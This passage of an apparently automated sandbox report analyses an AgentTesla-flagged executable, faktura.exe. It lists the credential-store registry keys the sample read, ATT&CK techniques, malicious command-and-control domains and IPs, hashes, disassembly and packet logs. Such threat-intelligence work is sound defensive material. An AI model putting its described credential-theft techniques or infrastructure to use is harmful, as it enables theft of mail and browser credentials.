Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior

Source: Yara match	File source: 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6148, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6148, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Access Token Manipulation1	Disable or Modify Tools11	OS Credential Dumping2	Query Registry1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection112	Virtualization/Sandbox Evasion341	Credentials in Registry1	Security Software Discovery731	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Access Token Manipulation1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Local System2	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Virtualization/Sandbox Evasion341	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol112	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery424	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
faktura.exe	32%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
felgui.pt	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://kij0jMdbT7S0DxfQ.net	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://HgEvCf.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
felgui.pt	185.31.158.175	true	true	0%, Virustotal, Browse	unknown
googlehosted.l.googleusercontent.com	216.58.215.225	true	false		high
mail.felgui.pt	unknown	unknown	true		unknown
doc-0o-7c-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://kij0jMdbT7S0DxfQ.net	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	RegAsm.exe, 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://HgEvCf.com	RegAsm.exe, 00000003.00000002.908261249.000000001DCC1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
216.58.215.225	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false
185.31.158.175	felgui.pt	Portugal		9186	ONILisbonPortugalPT	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385392
Start date:	12.04.2021
Start time:	12:31:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	faktura.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@6/1@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 41.1% (good quality ratio 13.6%) Quality average: 16.5% Quality standard deviation: 26.4%
HCA Information:	Successful, ratio: 97% Number of executed functions: 187 Number of non-executed functions: 10
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.113.196.254, 13.107.3.254, 13.107.246.254, 13.64.90.137, 104.43.139.144, 216.58.215.238, 20.82.209.183, 92.122.213.194, 92.122.213.247, 104.43.193.48, 104.42.151.234, 52.155.217.156, 20.54.26.129, 2.20.142.209, 2.20.142.210, 20.82.210.154 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, s-ring.msedge.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, teams-9999.teams-msedge.net, audownload.windowsupdate.nsatc.net, drive.google.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, s-9999.s-msedge.net, blobcollector.events.data.trafficmanager.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:32:22	API Interceptor	855x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ONILisbonPortugalPT	Orderlist_267409.pdf.exe	Get hash	malicious	Browse	185.90.59.42
	PO_ 09162020.doc	Get hash	malicious	Browse	185.90.59.243
	https://demo.nrnow.pt/wp-content/themes/image/home.php	Get hash	malicious	Browse	185.90.56.28
	CWRO20-09.doc	Get hash	malicious	Browse	185.90.59.243
	#U5909#U53162020.09.doc	Get hash	malicious	Browse	185.90.59.243
	EQVNPU20.09.doc	Get hash	malicious	Browse	185.90.59.243
	0601_pdf.exe	Get hash	malicious	Browse	185.90.59.42
	Clasquin France SARL - Demande client 001259 - SKBMT-07-29-2020-115-img00273.exe	Get hash	malicious	Browse	185.90.56.35
	https://boavistawindows.com	Get hash	malicious	Browse	5.253.181.163
	http://www.thevisionaire.net/Invoice-31882146/	Get hash	malicious	Browse	213.58.147.102
	refugee.doc	Get hash	malicious	Browse	213.58.147.102
	refugee.doc	Get hash	malicious	Browse	213.58.147.102

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	PaymentCopy.vbs	Get hash	malicious	Browse	216.58.215.225
	PO NUMBER 3120386 3120393 SIGNED.exe	Get hash	malicious	Browse	216.58.215.225
	RemitSwift119353 xlsx.htm	Get hash	malicious	Browse	216.58.215.225
	os9TZxfmTZ.exe	Get hash	malicious	Browse	216.58.215.225
	SWIFT Payment Advise 39 430-25.exe	Get hash	malicious	Browse	216.58.215.225
	malevolo.ps1	Get hash	malicious	Browse	216.58.215.225
	shipping document.exe	Get hash	malicious	Browse	216.58.215.225
	Statement-ID261179932209970.vbs	Get hash	malicious	Browse	216.58.215.225
	Alexandra38.docx	Get hash	malicious	Browse	216.58.215.225
	rRobw1VVRP.exe	Get hash	malicious	Browse	216.58.215.225
	Tmd7W7qwQw.dll	Get hash	malicious	Browse	216.58.215.225
	SecuriteInfo.com.Trojan.Agent.FFIJ.17175.exe	Get hash	malicious	Browse	216.58.215.225
	documents-351331057.xlsm	Get hash	malicious	Browse	216.58.215.225
	documents-1819557117.xlsm	Get hash	malicious	Browse	216.58.215.225
	mail_6512365134_7863_202104108.html	Get hash	malicious	Browse	216.58.215.225
	Copia bancaria de swift.exe	Get hash	malicious	Browse	216.58.215.225
	SecuriteInfo.com.Trojan.GenericKD.36659493.29456.exe	Get hash	malicious	Browse	216.58.215.225
	SecuriteInfo.com.Trojan.Siggen12.64197.30705.exe	Get hash	malicious	Browse	216.58.215.225
	#Ud83d#Udcde973.htm	Get hash	malicious	Browse	216.58.215.225

Dropped Files

No context

Created / dropped Files

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.712007953970682
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	faktura.exe
File size:	86016
MD5:	4a4501e0665974a9aee852ea13e6e7f6
SHA1:	200399b39a95fa717ccd64e51c7b5515e4b1a3a7
SHA256:	cb4b104a48fd8927dd979c9f7381707470432540161a2be6e1eabcee470020b8
SHA512:	156185f13b31304e76d486b3bad4b8e43cbae4261b96b1996d8301bdf68de6b3353f8c67dc1fdae0c84fa7100be13469bc833de906e9688e9861d475d79bdf80
SSDEEP:	1536:6vUULwK+YaTMDDeDTw4F6qPRE08raVX5siZQz9:vULbaTMDiDTVZjy
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....t`................. ...0...............0....@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x4015b8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x60741610 [Mon Apr 12 09:42:40 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4ba170b6a3de0ed01456bc01eac94f5d

Entrypoint Preview

Instruction
push 004017A8h
call 00007FC25CDE3F43h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi+21B10C5Eh], al
pushad
mov ecx, 77AF8E44h
in eax, dx
cld
dec esi
test byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], ch
pop edi
sbb byte ptr [ebx], al
push edx
push ebp
dec esi
inc esp
push esp
push ebp
push edx
inc ebp
add byte ptr [eax], cl
inc ecx
add byte ptr [eax], ah
or byte ptr [ecx+00h], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
add eax, E72DE951h
js 00007FC25CDE3EE5h
lds eax, fword ptr [ebx-75h]
jl 00007FC25CDE3EF4h
call 00007FC203D81EA9h
lahf
dec eax
push edi
loopne 00007FC25CDE3EF3h
scasb
inc edx
xchg eax, esi
add dword ptr [edx+ebx*2-39h], ebx
cmp ebx, dword ptr [ebx+6Fh]
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc esp
add dword ptr [eax], eax
add byte ptr [ebx+00h], bl
add byte ptr [eax], al
add byte ptr [41454700h], al
push edx
push ebx
add byte ptr [46001401h], cl
push 0000006Ch
jc 00007FC25CDE3FB7h
je 00007FC25CDE3FB3h
bound ebp, dword ptr [eax+eax+00h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x126b4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x15000	0x90c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1a8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11d34	0x12000	False	0.45270453559	data	6.23295630947	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x13000	0x12e8	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x15000	0x90c	0x1000	False	0.168701171875	data	1.97869504775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x157dc	0x130	data
RT_ICON	0x154f4	0x2e8	data
RT_ICON	0x153cc	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x1539c	0x30	data
RT_VERSION	0x15150	0x24c	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaRecAnsiToUni, __vbaStrCat, __vbaSetSystemError, __vbaRecDestruct, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaCyStr, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRecUniToAnsi, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaFpCmpCy, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaInStrVar, _CIlog, __vbaFileOpen, __vbaNew2, __vbaVar2Vec, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, __vbaRecDestructAnsi, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0404 0x04b0
InternalName	lnoverfrslers
FileVersion	1.00
CompanyName	Pixar
ProductName	Pixar
ProductVersion	1.00
FileDescription	Pixar
OriginalFilename	lnoverfrslers.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 12:32:15.428812981 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.475714922 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.475919008 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.477658033 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.524838924 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.538342953 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.538431883 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.538475990 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.538479090 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.538513899 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.538573980 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.538661003 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.557836056 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.603912115 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.604077101 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.606158018 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.656802893 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.870677948 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.870723963 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.870759010 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.870798111 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.870835066 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.870857000 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.870887041 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.870985985 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.874026060 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.874059916 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.874135971 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.874221087 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.877454996 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.877489090 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.877572060 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.877629042 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.880759954 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.880808115 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.880873919 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.880923033 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.884094000 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.884135008 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.884222031 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.884264946 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.886877060 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.886918068 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.887021065 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.887075901 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.916469097 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.916526079 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.916574001 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.916609049 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.918062925 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.918106079 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.918311119 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.921478033 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.921519041 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.921610117 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.921653032 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.924873114 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.924913883 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.924974918 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.925035954 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.928263903 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.928308964 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.928371906 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.928411961 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.931653976 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.931699991 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.931754112 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.931796074 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.935044050 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.935087919 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.935211897 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.935323954 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.938543081 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.938591003 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.938632011 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.938676119 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.941643953 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.941692114 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.944766998 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.944813013 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.947479963 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.947531939 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.949839115 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.951750040 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.951780081 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.951850891 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.951878071 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.954535961 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.954562902 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.954689026 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.956168890 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.956199884 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.956302881 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.958982944 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.959080935 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.959095955 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.959163904 CEST	49742	443	192.168.2.4	216.58.215.225
Apr 12, 2021 12:32:15.962201118 CEST	443	49742	216.58.215.225	192.168.2.4
Apr 12, 2021 12:32:15.962245941 CEST	443	49742	216.58.215.225	192.168.2.4
